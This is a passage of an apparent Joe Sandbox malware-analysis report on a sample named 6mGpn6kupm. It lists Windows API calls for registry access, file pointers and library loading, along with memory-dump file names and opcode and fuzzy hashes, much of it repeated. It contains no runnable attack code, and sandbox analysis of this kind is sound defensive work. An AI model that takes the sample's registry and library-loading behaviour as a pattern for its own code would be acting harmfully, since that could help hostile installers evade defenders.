                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                              • SetFilePointer.KERNELBASE(001660AE,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer$CountTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 1092082344-0
                                                                                                              • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                              • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 334405425-0
                                                                                                              • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                              • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(005D3CF0), ref: 00401BE7
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3394109436-1824292864
                                                                                                              • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                              • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                              • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                              • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvC041.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 397863658-0
                                                                                                              • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                              • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                              • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvC041.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3356406503-0
                                                                                                              • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                              • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
